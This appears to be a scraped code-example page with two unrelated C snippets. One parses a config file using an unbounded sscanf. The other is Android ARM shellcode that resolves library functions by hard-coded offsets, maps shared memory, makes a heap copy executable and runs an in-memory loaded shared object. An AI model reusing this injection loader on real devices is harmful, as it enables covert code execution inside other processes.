Exemplo n.º 1
0
void main(int argc,char *argv[])
{

	char bufkey[32];
	char bufvalue[100];
	char bufline[100];

	FILE* fp = fopen(argv[1],"r+");

	memset(bufkey,0,sizeof(bufkey));
	memset(bufvalue,0,sizeof(bufvalue));
	memset(bufline,0,sizeof(bufline));

	while(1) {
		if(fgets(bufline,sizeof(bufline),fp)){
			bufline[strlen(bufline) - 1] = '\0';
			printf("oen bufile is %s\n",bufline);
			sscanf(bufline,"%[^=]=\"%[^\"]",bufkey,bufvalue);
			printf("tow bufkey is %s\n",bufkey);
			printf("threed bufvalue is %s\n",bufvalue);
	
		}else break;
	}

	softwareconfig_mode_init(argv[1]);
	get_employeelist(&employeelist);
	printf_f(&employeelist);

}
Exemplo n.º 2
0
//let gcc help us generate shellcode, less asm, hard code dlsym
void shellcode(dlopen_t dlopen_f,void *pos){
    char *str_array = NULL;
    //construct string table in function
    asm __volatile__ ("mov %[result],pc":[result]"=r" (str_array));
    asm __volatile__ ("b .L_strlen_start");
    asm __volatile__ (".align 1");
    asm __volatile__ (".asciz \"printf\"");
    asm __volatile__ (".asciz \"__android_log_print\"");
    asm __volatile__ (".asciz \"mmap\"");
    asm __volatile__ (".asciz \"ashmem_pin_region\"");
    asm __volatile__ (".asciz \"ashmem_unpin_region\"");
    asm __volatile__ (".asciz \"ashmem_get_size_region\"");
    asm __volatile__ (".asciz \"mprotect\"");
    asm __volatile__ (".asciz \"malloc\"");
    asm __volatile__ (".asciz \"memcpy\"");
    asm __volatile__ (".asciz \"fd is %d, %x,%s\\n\"");
    asm __volatile__ (".asciz \"\xff\"");
    asm __volatile__ (".align 1");
    asm __volatile__ (".L_strlen_start:");
    //printf("start exec shellcode\n");
    char *fun_array[50];
    char *p = str_array;
    for(int i=0;i<50;i++){
        if(*p==0xff)
            break;
        fun_array[i]=p;
        while(*p++!=0);
    }
    if((int)dlopen_f%2==0)
        dlopen_f = (dlopen_t)((int)(dlopen_f)+1);
    dlsym_t dlsym_f = (dlsym_t)((int)dlopen_f+8);
    void *handle = dlopen_f(NULL,RTLD_NOW);

    int f = 0;
    printf_t printf_f = (printf_t)dlsym_f(handle,fun_array[f++]);
    #define getaddr(func_name) func_name##_t func_name##_f = (func_name##_t)dlsym_f(handle,fun_array[f++])
    getaddr(__android_log_print);
    getaddr(mmap);
    getaddr(ashmem_pin_region);
    getaddr(ashmem_unpin_region);
    getaddr(ashmem_get_size_region);
    getaddr(mprotect);
    getaddr(malloc);
    getaddr(memcpy);
    int s=9;
    int fd_memory = *(int*)(int(pos)+12);
    int pipe_from_client = *(int*)(int(pos)+16);
    int pipe_to_client = *(int*)(int(pos)+20);
    ashmem_pin_region_f(fd_memory, 0, 0);
    int ashem_size=ashmem_get_size_region_f(fd_memory);
    uint8_t *shm = (uint8_t*)mmap_f(NULL, ashem_size, PROT_READ, MAP_SHARED, fd_memory, 0);
    //ashmem_unpin_region_f(fd_memory, 0, 0);
    //can't mprotect ashmem as read and write, copy it to heap
    char *code = (char*)malloc_f(ashem_size);
    memcpy_f(code, shm, ashem_size);
    mprotect_f((void*)((uint32_t)code&0xfffff000), ashem_size, PROT_READ|PROT_WRITE|PROT_EXEC);
    //printf("start exec load so from memory\n");
    printf_f(fun_array[s],fd_memory,(char*)code,fun_array[s-2]);
    __android_log_print_f(3,fun_array[0],fun_array[s],fd_memory,code,fun_array[s-2]);
    so_start_t so_start = (so_start_t)run_code((char*)code,dlopen_f);
    //mprotect_f((void*)((uint32_t)code&0xfffff000), ashem_size, PROT_READ|PROT_EXEC);
    so_start(pipe_from_client,pipe_to_client);
}